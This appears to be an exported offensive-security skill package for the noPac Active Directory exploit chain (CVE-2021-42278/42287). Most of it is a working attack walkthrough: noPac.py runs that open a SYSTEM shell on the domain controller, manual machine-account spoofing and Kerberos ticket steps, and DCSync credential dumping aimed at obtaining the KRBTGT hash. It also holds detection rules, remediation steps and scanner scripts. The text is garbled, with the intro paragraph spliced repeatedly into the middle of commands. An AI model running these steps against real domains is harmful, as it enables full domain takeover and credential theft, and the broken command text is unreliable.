Exploiting noPac (CVE-2021-42278 / CVE-2021-42287) Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. Overview noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 second…

-computer-pass 'AttackPass123' \\\n -dc-ip 10.10.10.1 domain.local/user:'Password123'\n ```\n2. Clear the SPN and rename sAMAccountName:\n ```bash\n # Rename machine account sAMAccountName to DC name (without $)\n renameMachine.py -current-name 'ATTACKPC

Exploiting noPac (CVE-2021-42278 / CVE-2021-42287) Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. Overview noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 second…

-new-name 'DC01' \\\n -dc-ip 10.10.10.1 domain.local/user:'Password123'\n ```\n3. Request a TGT for the spoofed name:\n ```bash\n getTGT.py -dc-ip 10.10.10.1 domain.local/'DC01':'AttackPass123'\n ```\n4. Restore the original machine name:\n ```bash\n renameMachine.py -current-name 'DC01' -new-name 'ATTACKPC

Exploiting noPac (CVE-2021-42278 / CVE-2021-42287) Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. Overview noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 second…

\\\n -dc-ip 10.10.10.1 domain.local/user:'Password123'\n ```\n5. Use S4U2self for impersonation:\n ```bash\n export KRB5CCNAME=DC01.ccache\n getST.py -self -impersonate 'administrator' -altservice 'cifs/DC01.domain.local' \\\n -k -no-pass -dc-ip 10.10.10.1 domain.local/'ATTACKPC

Exploiting noPac (CVE-2021-42278 / CVE-2021-42287) Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. Overview noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 second…

\n ```\n\n## Tools and Resources\n\n| Tool | Purpose | Platform |\n|------|---------|----------|\n| noPac (cube0x0) | Automated scanner and exploiter | Python |\n| noPac (Ridter) | Alternative exploit implementation | Python |\n| Impacket | Kerberos ticket manipulation, DCSync | Python |\n| CrackMapExec | Vulnerability scanning module | Python |\n| Rubeus | Windows Kerberos ticket operations | Windows (.NET) |\n| secretsdump.py | Post-exploitation credential dumping | Python |\n\n## CVE Details\n\n| CVE | Description | CVSS | Patch |\n|-----|-------------|------|-------|\n| CVE-2021-42278 | sAMAccountName spoofing (machine accounts) | 7.5 | KB5008102 |\n| CVE-2021-42287 | KDC PAC confusion / privilege escalation | 7.5 | KB5008380 |\n\n## Detection Signatures\n\n| Indicator | Detection Method |\n|-----------|-----------------|\n| Machine account sAMAccountName change | Event 4742 (computer account changed) with sAMAccountName modification |\n| New machine account creation | Event 4741 (computer object created) |\n| TGT request for account without trailing $ | Kerberos audit log analysis |\n| S4U2self requests from non-DC machine accounts | Event 4769 with unusual service ticket requests |\n| Rapid sequence: create account, rename, request TGT | SIEM correlation rule for noPac attack pattern |\n\n## Validation Criteria\n\n- [ ] Domain scanned for noPac vulnerability\n- [ ] MachineAccountQuota verified (default 10)\n- [ ] Exploit executed successfully (shell or DCSync)\n- [ ] Domain Admin privileges obtained from standard user\n- [ ] DCSync performed to dump domain credentials\n- [ ] KRBTGT hash obtained for persistence validation\n- [ ] Attack chain documented with timestamps\n- [ ] Patch status verified (KB5008380, KB5008602)\n---","attachment_filenames":["assets/template.md","references/api-reference.md","references/standards.md","references/workflows.md","scripts/agent.py","scripts/process.py"],"attachments":[{"filename":"assets/template.md","content":"# noPac Exploitation Report Template\n\n## Target Information\n\n| Field | Value |\n|-------|-------|\n| Domain | |\n| DC Hostname | |\n| DC IP | |\n| Initial User | |\n| MachineAccountQuota | |\n| Patch Level | KB5008380 / KB5008602 |\n\n## Exploitation Steps\n\n| Step | Action | Result | Timestamp |\n|------|--------|--------|-----------|\n| 1 | Vulnerability scan | Vulnerable / Not Vulnerable | |\n| 2 | Machine account creation | Success / Failed | |\n| 3 | sAMAccountName spoofing | Success / Failed | |\n| 4 | TGT request | Ticket obtained / Failed | |\n| 5 | S4U2self impersonation | DA ticket / Failed | |\n| 6 | DCSync | Hashes dumped / Failed | |\n\n## Remediation\n\n| Action | Priority | Status |\n|--------|----------|--------|\n| Apply KB5008380 | Critical | |\n| Apply KB5008602 | Critical | |\n| Set MachineAccountQuota to 0 | High | |\n| Monitor Event 4741/4742 | Medium | |\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":864,"content_sha256":"a27a5d1849c4e21b247a1815d6fc508895461e689ca0143110ce493e8a200653"},{"filename":"references/api-reference.md","content":"# API Reference: noPac (CVE-2021-42278/42287)\n\n## Vulnerability Overview\n\n### CVE-2021-42278 — sAMAccountName Spoofing\nAllows renaming a machine account's sAMAccountName to match a DC name (without trailing $).\n\n### CVE-2021-42287 — KDC Confusion\nKDC fails to verify PAC when sAMAccountName doesn't match, granting DC-level TGT.\n\n### Attack Chain\n1. Create machine account (MachineAccountQuota > 0)\n2. Rename machine sAMAccountName to DC name (e.g., DC01)\n3. Request TGT for spoofed name\n4. Rename back to original\n5. Request S4U2Self — KDC returns ticket as DC$\n\n## noPac.py (Impacket)\n\n### Scan for Vulnerability\n```bash\nnoPac.py domain.local/user:password -dc-ip 10.10.10.1 --scan\n```\n\n### Exploit (Get Shell)\n```bash\nnoPac.py domain.local/user:password -dc-ip 10.10.10.1 \\\n -use-ldap -shell\n```\n\n### Dump Hashes\n```bash\nnoPac.py domain.local/user:password -dc-ip 10.10.10.1 \\\n -use-ldap -dump\n```\n\n## Prerequisites\n\n### MachineAccountQuota\n```powershell\n# Check quota\n([ADSI]\"LDAP://DC=domain,DC=local\").\"ms-DS-MachineAccountQuota\"\n# Default: 10 (any domain user can create 10 machine accounts)\n```\n\n### LDAP Query\n```ldap\n(&(objectClass=domain)(ms-DS-MachineAccountQuota>=1))\n```\n\n## Detection\n\n### Event IDs\n| Event | Log | Description |\n|-------|-----|-------------|\n| 4741 | Security | Computer account created |\n| 4742 | Security | Computer account changed |\n| 4743 | Security | Computer account deleted |\n| 4781 | Security | Account renamed |\n| 4768 | Security | TGT requested |\n\n### Detection Query\n```kql\nSecurityEvent\n| where EventID == 4781\n| where TargetUserName !endswith \"$\"\n| where TargetUserName in (\"DC01\", \"DC02\")\n```\n\n## Patch Information\n\n### Microsoft KB\n| KB | Description |\n|----|-------------|\n| KB5008380 | November 2021 patch |\n| KB5008602 | OOB patch |\n| KB5008207 | Cumulative update |\n\n## Remediation\n1. Apply KB5008380 patch\n2. Set MachineAccountQuota to 0\n3. Monitor Event 4741 and 4781 for anomalies\n4. Enable PAC validation on all DCs\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":1983,"content_sha256":"14b96081e0cf7ce84d8c4f735077adba49f5690286c287632d574a85950615b7"},{"filename":"references/standards.md","content":"# Standards and References - noPac CVE-2021-42278/42287\n\n## MITRE ATT&CK References\n\n| Technique ID | Name | Tactic |\n|-------------|------|--------|\n| T1068 | Exploitation for Privilege Escalation | Privilege Escalation |\n| T1136.002 | Create Account: Domain Account | Persistence |\n| T1078.002 | Valid Accounts: Domain Accounts | Initial Access |\n| T1558 | Steal or Forge Kerberos Tickets | Credential Access |\n| T1003.006 | OS Credential Dumping: DCSync | Credential Access |\n\n## CVE References\n\n- CVE-2021-42278: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42278\n- CVE-2021-42287: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287\n- Microsoft KB5008380: November 2021 Kerberos PAC fix\n- Microsoft KB5008602: November 2021 sAMAccountName fix\n\n## Key Research\n\n- CrowdStrike: noPac Exploit - Latest Microsoft AD Flaw\n- Fortinet: From User to Domain Admin in 60 Seconds\n- TrustedSec: Attack Path Mapping Approach to CVEs 2021-42287/42278\n- cube0x0 noPac: https://github.com/cube0x0/noPac\n- Ridter noPac: https://github.com/Ridter/noPac\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":1075,"content_sha256":"7e07c4ab32afb7b4a90f8ebbba824d8f736f81becabd2708d2c95fd25cb6cb2e"},{"filename":"references/workflows.md","content":"# Workflows - noPac Exploitation\n\n## Automated Exploitation Workflow\n\n```\n1. Scan → noPac scanner or CrackMapExec module\n2. Exploit → noPac.py with --impersonate administrator\n3. Access → Semi-interactive shell on DC or DCSync dump\n4. Persist → Extract KRBTGT hash for Golden Ticket\n```\n\n## Manual Exploitation Workflow\n\n```\n1. Create machine account (addcomputer.py)\n2. Rename sAMAccountName to DC name without $ (renameMachine.py)\n3. Request TGT for spoofed name (getTGT.py)\n4. Restore original name (renameMachine.py)\n5. S4U2self impersonation (getST.py)\n6. Use ticket for DCSync (secretsdump.py -k)\n```\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":615,"content_sha256":"9393cf8522354f3f3c15ba618b1ce1c8831d0965662c368bdeff383f8492012e"},{"filename":"scripts/agent.py","content":"#!/usr/bin/env python3\n\"\"\"Agent for detecting noPac (CVE-2021-42278/42287) AD privilege escalation vulnerability.\"\"\"\n\nimport argparse\nimport json\nimport subprocess\nimport sys\nfrom datetime import datetime, timezone\n\n\ndef check_nopac_impacket(domain, username, password, dc_ip):\n \"\"\"Check for noPac vulnerability using Impacket noPac.py.\"\"\"\n cmd = [\n \"noPac.py\", f\"{domain}/{username}:{password}\",\n \"-dc-ip\", dc_ip, \"--scan\",\n ]\n try:\n result = subprocess.check_output(\n cmd, text=True, errors=\"replace\", timeout=30\n )\n return {\n \"method\": \"noPac.py\",\n \"vulnerable\": \"VULNERABLE\" in result.upper() or \"success\" in result.lower(),\n \"output\": result[:1000],\n }\n except (subprocess.SubprocessError, FileNotFoundError):\n return {\"method\": \"noPac.py\", \"status\": \"tool not available\"}\n\n\ndef check_machineaccountquota(domain, username, password, dc_ip):\n \"\"\"Check the MachineAccountQuota via LDAP — needed for noPac.\"\"\"\n ps_cmd = (\n \"([ADSI]'LDAP://DC='+($env:USERDNSDOMAIN -replace '\\\\.',',DC=')).'ms-DS-MachineAccountQuota'\"\n )\n try:\n result = subprocess.check_output(\n [\"powershell\", \"-NoProfile\", \"-Command\", ps_cmd],\n text=True, errors=\"replace\", timeout=10\n )\n quota = int(result.strip()) if result.strip().isdigit() else -1\n return {\n \"machine_account_quota\": quota,\n \"exploitable\": quota > 0,\n \"note\": \"Quota > 0 means any domain user can create machine accounts\",\n }\n except (subprocess.SubprocessError, ValueError):\n return {\"machine_account_quota\": \"unknown\"}\n\n\ndef check_patch_status():\n \"\"\"Check if KB5008380 (noPac patch) is installed.\"\"\"\n if sys.platform != \"win32\":\n return {\"status\": \"non-windows\"}\n try:\n result = subprocess.check_output(\n [\"wmic\", \"qfe\", \"list\", \"brief\"],\n text=True, errors=\"replace\", timeout=15\n )\n patched = any(kb in result for kb in [\"KB5008380\", \"KB5008602\", \"KB5008207\"])\n return {\n \"patched\": patched,\n \"relevant_kbs\": [\"KB5008380\", \"KB5008602\", \"KB5008207\"],\n }\n except subprocess.SubprocessError:\n return {\"status\": \"check_failed\"}\n\n\ndef enumerate_sam_name_impersonation():\n \"\"\"Check for sAMAccountName impersonation conditions.\"\"\"\n ps_cmd = (\n \"Get-ADComputer -Filter * -Properties sAMAccountName | \"\n \"Where-Object {$_.sAMAccountName -notmatch '\\\\$'} | \"\n \"Select-Object Name,sAMAccountName | ConvertTo-Json\"\n )\n try:\n result = subprocess.check_output(\n [\"powershell\", \"-NoProfile\", \"-Command\", ps_cmd],\n text=True, errors=\"replace\", timeout=15\n )\n data = json.loads(result) if result.strip() else []\n return data if isinstance(data, list) else [data]\n except (subprocess.SubprocessError, json.JSONDecodeError):\n return []\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Detect noPac CVE-2021-42278/42287 vulnerability (authorized testing only)\"\n )\n parser.add_argument(\"--domain\", help=\"AD domain\")\n parser.add_argument(\"--username\", help=\"Domain username\")\n parser.add_argument(\"--password\", help=\"Domain password\")\n parser.add_argument(\"--dc-ip\", help=\"Domain controller IP\")\n parser.add_argument(\"--check-patch\", action=\"store_true\")\n parser.add_argument(\"--output\", \"-o\", help=\"Output JSON report\")\n args = parser.parse_args()\n\n print(\"[*] noPac (CVE-2021-42278/42287) Detection Agent\")\n print(\"[!] For authorized security testing only\")\n report = {\"timestamp\": datetime.now(timezone.utc).isoformat(), \"findings\": {}}\n\n if args.domain and args.username:\n nopac = check_nopac_impacket(\n args.domain, args.username, args.password or \"\", args.dc_ip or \"\"\n )\n report[\"findings\"][\"nopac_scan\"] = nopac\n print(f\"[*] noPac scan: {nopac.get('vulnerable', 'unknown')}\")\n\n quota = check_machineaccountquota(args.domain, args.username, args.password or \"\", args.dc_ip or \"\")\n report[\"findings\"][\"machine_quota\"] = quota\n\n if args.check_patch:\n patch = check_patch_status()\n report[\"findings\"][\"patch_status\"] = patch\n print(f\"[*] Patched: {patch.get('patched', 'unknown')}\")\n\n report[\"risk_level\"] = \"CRITICAL\" if any(\n v.get(\"vulnerable\") or v.get(\"exploitable\") for v in report[\"findings\"].values() if isinstance(v, dict)\n ) else \"LOW\"\n\n if args.output:\n with open(args.output, \"w\") as f:\n json.dump(report, f, indent=2)\n print(f\"[*] Report saved to {args.output}\")\n else:\n print(json.dumps(report, indent=2))\n\n\nif __name__ == \"__main__\":\n main()\n","content_type":"text/x-python; charset=utf-8","language":"python","size":4803,"content_sha256":"5e12e675e35963bc00633e952e36519493b9bc7f39c3297ea1b12d3de03f1fbe"},{"filename":"scripts/process.py","content":"#!/usr/bin/env python3\n\"\"\"\nnoPac Vulnerability Scanner and Assessment Script\n\nChecks Active Directory environments for CVE-2021-42278/42287 vulnerability\nby verifying patch status and MachineAccountQuota settings.\nFor authorized red team engagements only.\n\"\"\"\n\nimport subprocess\nimport sys\nimport json\nimport os\nfrom datetime import datetime\n\n\ndef check_machine_account_quota(dc_ip: str, domain: str, username: str, password: str) -> dict:\n \"\"\"Check MachineAccountQuota via LDAP query.\"\"\"\n try:\n result = subprocess.run(\n [\n \"python3\", \"-c\",\n f\"\"\"\nimport ldap3\nserver = ldap3.Server('{dc_ip}')\nconn = ldap3.Connection(server, '{domain}\\\\\\\\{username}', '{password}', auto_bind=True)\nconn.search('{\",\".join([\"DC=\" + p for p in domain.split(\".\")])}', '(objectClass=domain)',\n attributes=['ms-DS-MachineAccountQuota'])\nif conn.entries:\n print(conn.entries[0]['ms-DS-MachineAccountQuota'])\nelse:\n print('QUERY_FAILED')\n\"\"\"\n ],\n capture_output=True, text=True, timeout=30\n )\n quota = result.stdout.strip()\n return {\n \"status\": \"success\",\n \"quota\": int(quota) if quota.isdigit() else -1,\n \"exploitable\": int(quota) > 0 if quota.isdigit() else False\n }\n except Exception as e:\n return {\"status\": \"error\", \"error\": str(e)}\n\n\ndef run_nopac_scanner(dc_ip: str, domain: str, username: str, password: str) -> dict:\n \"\"\"Run noPac scanner to check vulnerability status.\"\"\"\n try:\n result = subprocess.run(\n [\"python3\", \"scanner.py\", f\"{domain}/{username}:{password}\", \"-dc-ip\", dc_ip],\n capture_output=True, text=True, timeout=60\n )\n output = result.stdout + result.stderr\n vulnerable = \"VULNERABLE\" in output.upper() or \"vulnerable\" in output.lower()\n return {\n \"status\": \"success\",\n \"vulnerable\": vulnerable,\n \"output\": output.strip()[:1000]\n }\n except FileNotFoundError:\n return {\"status\": \"error\", \"error\": \"noPac scanner not found. Clone from https://github.com/cube0x0/noPac\"}\n except Exception as e:\n return {\"status\": \"error\", \"error\": str(e)}\n\n\ndef generate_assessment_report(dc_ip: str, domain: str, quota_result: dict, scan_result: dict) -> str:\n \"\"\"Generate noPac vulnerability assessment report.\"\"\"\n report = [\n \"=\" * 60,\n \"noPac (CVE-2021-42278/42287) Vulnerability Assessment\",\n f\"Generated: {datetime.now().isoformat()}\",\n \"=\" * 60,\n \"\",\n f\"Target DC: {dc_ip}\",\n f\"Domain: {domain}\",\n \"\",\n \"[MachineAccountQuota Check]\",\n ]\n\n if quota_result[\"status\"] == \"success\":\n quota = quota_result[\"quota\"]\n report.append(f\" MachineAccountQuota: {quota}\")\n if quota > 0:\n report.append(f\" Status: EXPLOITABLE - Users can create up to {quota} machine accounts\")\n elif quota == 0:\n report.append(\" Status: MITIGATED - Machine account creation disabled\")\n else:\n report.append(\" Status: UNKNOWN - Could not determine quota\")\n else:\n report.append(f\" Error: {quota_result.get('error', 'Unknown error')}\")\n\n report.append(\"\")\n report.append(\"[noPac Scanner Result]\")\n if scan_result[\"status\"] == \"success\":\n status = \"VULNERABLE\" if scan_result[\"vulnerable\"] else \"NOT VULNERABLE\"\n report.append(f\" Status: {status}\")\n report.append(f\" Details: {scan_result['output'][:500]}\")\n else:\n report.append(f\" Error: {scan_result.get('error', 'Unknown error')}\")\n\n report.extend([\n \"\",\n \"[Remediation]\",\n \" 1. Apply KB5008380 (CVE-2021-42287 Kerberos PAC fix)\",\n \" 2. Apply KB5008602 (CVE-2021-42278 sAMAccountName fix)\",\n \" 3. Set MachineAccountQuota to 0:\",\n \" Set-ADDomain -Identity domain.local -Replace @{'ms-DS-MachineAccountQuota'='0'}\",\n \" 4. Monitor Event 4741 (machine account creation) and 4742 (modification)\",\n \"\",\n \"=\" * 60\n ])\n\n return \"\\n\".join(report)\n\n\ndef main():\n \"\"\"Main entry point.\"\"\"\n if len(sys.argv) \u003c 4:\n print(\"Usage: python process.py \u003cdc_ip> \u003cdomain> \u003cusername> \u003cpassword>\")\n print(\"Example: python process.py 10.10.10.1 domain.local user Password123\")\n return\n\n dc_ip = sys.argv[1]\n domain = sys.argv[2]\n username = sys.argv[3]\n password = sys.argv[4] if len(sys.argv) > 4 else \"\"\n\n print(f\"Checking noPac vulnerability for {domain} at {dc_ip}...\")\n quota_result = check_machine_account_quota(dc_ip, domain, username, password)\n scan_result = run_nopac_scanner(dc_ip, domain, username, password)\n\n report = generate_assessment_report(dc_ip, domain, quota_result, scan_result)\n print(report)\n\n report_file = f\"nopac_assessment_{datetime.now().strftime('%Y%m%d_%H%M%S')}.txt\"\n with open(report_file, \"w\") as f:\n f.write(report)\n print(f\"\\nReport saved to: {report_file}\")\n\n\nif __name__ == \"__main__\":\n main()\n","content_type":"text/x-python; charset=utf-8","language":"python","size":5056,"content_sha256":"e5a2f1d3b813fb38105588ea5ed675c875ae1720a1462b0fa152416746afd145"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Exploiting noPac (CVE-2021-42278 / CVE-2021-42287)","type":"text"}]},{"type":"blockquote","content":[{"type":"paragraph","content":[{"text":"Legal Notice:","type":"text","marks":[{"type":"strong"}]},{"text":" This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.","type":"text"}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Overview","type":"text"}]},{"type":"paragraph","content":[{"text":"noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 seconds. CVE-2021-42278 allows an attacker to modify a machine account's sAMAccountName attribute to match a Domain Controller's name (minus the trailing $). CVE-2021-42287 exploits a flaw in the Kerberos PAC validation where the KDC, unable to find the renamed account, falls back to appending $ and issues a ticket for the Domain Controller account. Microsoft patched both vulnerabilities in November 2021 (KB5008380 and KB5008602), but many environments remain unpatched. The exploit was publicly released by cube0x0 and Ridter in December 2021.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"When to Use","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When performing authorized security testing that involves exploiting nopac cve 2021 42278 42287","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When analyzing malware samples or attack artifacts in a controlled environment","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When conducting red team exercises or penetration testing engagements","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When building detection capabilities based on offensive technique understanding","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Prerequisites","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Familiarity with red teaming concepts and tools","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Access to a test or lab environment for safe execution","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Python 3.8+ with required dependencies installed","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Appropriate authorization for any testing activities","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Objectives","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Scan the target domain for noPac vulnerability (CVE-2021-42278/42287)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Create or leverage a machine account with modified sAMAccountName","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Exploit the KDC PAC confusion to obtain a TGT for the Domain Controller","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use the DC ticket to perform DCSync and dump domain credentials","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Achieve Domain Admin access from a standard domain user account","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document the complete exploitation chain with evidence","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"MITRE ATT&CK Mapping","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1068","type":"text","marks":[{"type":"strong"}]},{"text":" - Exploitation for Privilege Escalation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1136.002","type":"text","marks":[{"type":"strong"}]},{"text":" - Create Account: Domain Account","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1078.002","type":"text","marks":[{"type":"strong"}]},{"text":" - Valid Accounts: Domain Accounts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1558","type":"text","marks":[{"type":"strong"}]},{"text":" - Steal or Forge Kerberos Tickets","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1003.006","type":"text","marks":[{"type":"strong"}]},{"text":" - OS Credential Dumping: DCSync","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Workflow","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Phase 1: Vulnerability Scanning","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Check if the domain is vulnerable using the noPac scanner:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Using cube0x0's noPac scanner\npython3 scanner.py domain.local/user:'Password123' -dc-ip 10.10.10.1\n\n# Using CrackMapExec module\ncrackmapexec smb 10.10.10.1 -u user -p 'Password123' -M nopac","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verify the MachineAccountQuota (default is 10, allows any user to join computers):","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check MachineAccountQuota via LDAP\npython3 -c \"\nimport ldap3\nserver = ldap3.Server('10.10.10.1')\nconn = ldap3.Connection(server, 'domain.local\\\\user', 'Password123', auto_bind=True)\nconn.search('DC=domain,DC=local', '(objectClass=domain)', attributes=['ms-DS-MachineAccountQuota'])\nprint(conn.entries[0]['ms-DS-MachineAccountQuota'])\n\"","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Phase 2: Exploitation with noPac Tool","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Run the full noPac exploit chain:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Using cube0x0's noPac (gets a shell on the DC)\npython3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \\\n -dc-host DC01 -shell --impersonate administrator -use-ldap\n\n# Using Ridter's noPac (alternative implementation)\npython3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \\\n --impersonate administrator -dump","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"The exploit automatically:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Creates a new machine account (or uses an existing one)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Renames the machine account's sAMAccountName to match the DC (e.g., \"DC01\")","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Requests a TGT for the spoofed account name","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Restores the original sAMAccountName","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Uses S4U2self to obtain a service ticket impersonating the target user","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"The KDC finds no account matching \"DC01\" and falls back to \"DC01$\" (the real DC)","type":"text"}]}]}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Phase 3: Post-Exploitation","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"With the obtained Domain Controller ticket, perform DCSync:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# DCSync using secretsdump.py with the Kerberos ticket\nexport KRB5CCNAME=administrator.ccache\nsecretsdump.py -k -no-pass domain.local/[email protected]\n\n# Or directly through the noPac shell\n# The shell runs as SYSTEM on the DC","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Alternatively, obtain a semi-interactive shell:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \\\n -dc-host DC01 -shell --impersonate administrator -use-ldap","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Phase 4: Manual Exploitation Steps","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Create a machine account:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"addcomputer.py -computer-name 'ATTACKPC

Exploiting noPac (CVE-2021-42278 / CVE-2021-42287) Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. Overview noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 second…

-computer-pass 'AttackPass123' \\\n -dc-ip 10.10.10.1 domain.local/user:'Password123'","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Clear the SPN and rename sAMAccountName:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Rename machine account sAMAccountName to DC name (without $)\nrenameMachine.py -current-name 'ATTACKPC

Exploiting noPac (CVE-2021-42278 / CVE-2021-42287) Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. Overview noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 second…

-new-name 'DC01' \\\n -dc-ip 10.10.10.1 domain.local/user:'Password123'","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Request a TGT for the spoofed name:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"getTGT.py -dc-ip 10.10.10.1 domain.local/'DC01':'AttackPass123'","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Restore the original machine name:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"renameMachine.py -current-name 'DC01' -new-name 'ATTACKPC

